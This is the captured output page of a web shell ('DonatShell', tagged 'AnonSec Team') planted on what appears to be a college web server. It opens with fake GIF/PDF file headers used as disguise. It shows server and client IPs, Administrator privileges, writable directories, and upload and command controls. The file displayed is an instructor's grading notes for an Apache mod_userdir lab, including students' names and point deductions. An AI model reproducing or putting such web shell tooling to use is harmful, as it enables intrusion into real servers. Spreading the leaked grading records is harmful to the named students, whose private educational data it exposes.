GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/JimMartinson/Classes/CST1611/Labs/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/JimMartinson/Classes/CST1611/Labs/CST1611_Lab06_grading_notes.txt
Lab 6 - mod_userdir

Grading Criteria
Demonstrated assignment effectively: 10 points.
There are some things I expect. If they are incorrect you will lose the following:
Work submitted incorrectly: -1 pt. This covers errors such as incorrect files names, incorrect file formats, poor formatting, etc.
Second and subsequent submission of work for grading: -1 pt.
Work submitted late: -1 pt per week.
I reserve the right not to apply the deduction points at my absolute discretion.

-1 Work submitted late.

# Lab 6
LoadModule userdir_module modules/mod_userdir.so
UserDir "Documents/public_html"
<Directory "C:/Users/*/Documents/public_html">
    AllowOverride FileInfo AuthConfig Limit Indexes
    Options MultiViews Indexes SymLinksIfOwnerMatch IncludesNoExec
    <Limit GET POST OPTIONS>
        Require all granted
    </Limit>
    <LimitExcept GET POST OPTIONS>
        Require all denied
    </LimitExcept>
</Directory>

-3 You have configured two Directory directives.
   The way you have done it, you would need to add a Directory directive for each user.
   Instead, you should only have one and use a wildcard for the user login name.

-2 Step 1.2; You are using the wrong UserDir.
   It should be the public_html directory in the the user's default documents directory.
   You are using the user's default documents directory.
   
-2 http://localhost/~Michael did not work. Did you NOT login to the OS as Michael before testing the URL in the browser?
Call me for a web meeting and we can fix this.
=e

-2 Your CST1611-Lab06-3-4-GinoLuciano.png screenshot shows the same page as the CST1611-Lab06-2-4-GinoLuciano.png screenshot.
   You must have downloaded the index.html page from step 3 again and saved it in your anotheruser public_html folder.

-1 Step 2.4; Your AbdumalikSalah_Lab06_first.png does not show a user url.
   I see a page from apache.org.
   You need to use http://localhost/~user in the browser, where user is the primary user you log in with.
-1 Your DavidPetersen_Lab06_second.png does not show a user url.
   I see `CST1611 Lab06` in the location bar.
   You need to use http://localhost/~anotheruser in the browser, where anotheruser is the second user you made.
-1 Step 3.4; Your JustinHerzberg_Lab06_second.png screenshot is incorrect.
   I believe your did not download the correct index.html file into your second user public_html directory.

Anon7 - 2022
AnonSec Team